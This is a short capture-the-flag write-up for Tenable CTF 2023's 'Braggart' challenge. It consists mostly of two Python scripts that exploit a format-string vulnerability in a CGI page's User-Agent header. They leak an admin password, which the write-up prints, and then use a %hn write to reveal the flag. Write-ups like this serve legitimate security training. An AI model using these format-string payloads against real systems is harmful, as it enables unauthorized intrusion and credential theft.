CTFtime.org / Tenable CTF 2023 / Braggart / Writeup

First use printf to leak the adminpass, then use a printf %hn to overwrite "br" into a "fl" to leak the flag.

Leak AdminPass:

import pwn
import time
import warnings
import requests 

for i in range(320, 5000):
    try:
        r = requests.post("https://nessus-braggart.chals.io/sec.cgi", headers={"X-DEBUG": "1", "User-Agent": "A"*1008 + f"%{i}$s"}, timeout=5)
        
        d = r.text.split("User Agent : </h3>")[1].split("</pre>")[0]
        # d = bytes.fromhex(d[2:])[::-1]
        print(i, d)

    except:
        pass

# AdminPass=xbYP3h7Ua94c

Leak Flag:

import pwn
import time
import warnings
import requests 


r = requests.post("https://nessus-braggart.chals.io/sec.cgi", headers={"X-DEBUG": "1","X-PASSWORD":"xbYP3h7Ua94c" , "User-Agent": "A"*1008 + '%27750x' + "%267$hn" + "%267$s"}, timeout=5)        
# print(r.text
d = r.text.split("User Agent : </h3>")[1].split("</pre>")[0]
print(d)
print(r.text)

Full walkthrough can be found in video. https://youtu.be/g0mVAbZUXqM?t=1139

Original writeup (https://youtu.be/g0mVAbZUXqM?t=1139).

Braggart

Comments

Sign in with